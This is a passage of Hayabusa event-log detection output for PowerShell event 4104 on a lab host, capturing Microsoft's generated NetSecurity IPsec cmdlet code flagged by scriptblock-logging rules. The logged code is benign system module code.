[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; V",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"alue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Polic",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"alue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, 